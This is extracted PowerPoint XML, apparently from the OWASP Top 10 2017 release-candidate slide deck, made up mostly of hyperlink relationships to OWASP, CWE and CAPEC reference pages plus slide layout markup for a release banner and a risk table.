Target="https://www.owasp.org/index.php/Web_Service_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.tutsplus.com/articles/the-increasing-importance-of-apis-in-web-development--net-22368" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nordicapis.com/tracking-the-growth-of-the-api-economy/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techcrunch.com/2015/09/27/the-future-of-coding-is-here-and-threatens-to-wipe-out-everything-in-its-path/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cronofy.com/blog/the-growth-of-the-api/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://static.javadoc.io/org.owasp.esapi/esapi/2.1.0.1/overview-summary.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Education_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebGoat" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_WebGoat.NET" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Node_js_Goat_Project" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Projects" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Benchmark" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17.xml"/><Relationship Id="rId2"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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:OWASP-TopTen@lists.owasp.org" TargetMode="Externa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diagramData" Target="../diagrams/data1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors1.xml"/><Relationship Id="rId8" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18.xml"/><Relationship Id="rId2"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hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top10" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2010" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19.xml"/><Relationship Id="rId2"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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Deserialization_of_untrusted_data" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-A3" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Mass_assignment_vulnerability" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/915.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/918.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2013-A10-Unvalidated_Redirects_and_Forwards" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Privacy_Violation" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/502.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Deserialization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/uploads/downloads/2011/09/ExpressionLanguageInjection.pdf" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/Information-Leakage" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/209.html" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-A6" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/388.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://seclab.cs.ucsb.edu/media/uploads/papers/jsinclusions.pdf" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/829.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide20.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Clickjacking" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/103.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Application_Denial_of_Service" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/400.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/A9_2004_Application_Denial_of_Service"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hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Industry:Citations" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:owasp-topten@lists.owasp.org" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml"/><Relationship Id="rId2"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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vantagepoint.sg" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.veracode.com/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="NULL" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId25" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ibliss.com.br/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mindedsecurity.com/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paladion.net/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sonatype.com/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ruggedsoftware.org/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.astechconsulting.com/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.brandingbrand.com/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.contrastsecurity.com/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.edgescan.com/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ibliss.com.br" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mindedsecurity.com/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.paladion.net" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.softtek.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5.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hyperlink" Target="https://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.fairinstitute.org/fair-risk-management" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/download/details.aspx?id=49168" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5.xml"/><Relationship Id="rId2"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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/611.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://static.javadoc.io/org.owasp.esapi/esapi/2.1.0.1/org/owasp/esapi/Validator.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide6.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://static.javadoc.io/org.owasp.esapi/esapi/2.1.0.1/org/owasp/esapi/Authenticator.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_fixation" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_Management_Cheat_Shee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144000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343842" y="2514600"/>
            <a:ext cx="4170316" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" spc="0" dirty="0" smtClean="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Candidate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" cap="none" spc="0" dirty="0" smtClean="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>omments requested per</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" cap="none" spc="0" dirty="0" smtClean="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nstructions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>within</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" cap="none" spc="0" dirty="0">
              <a:ln w="24500" cmpd="dbl">
                <a:noFill/>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2124673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 name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308673320"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="956447"/>
          <a:ext cx="6858000" cy="2536892"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="648989">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r>
              <a:tr h="39946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rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
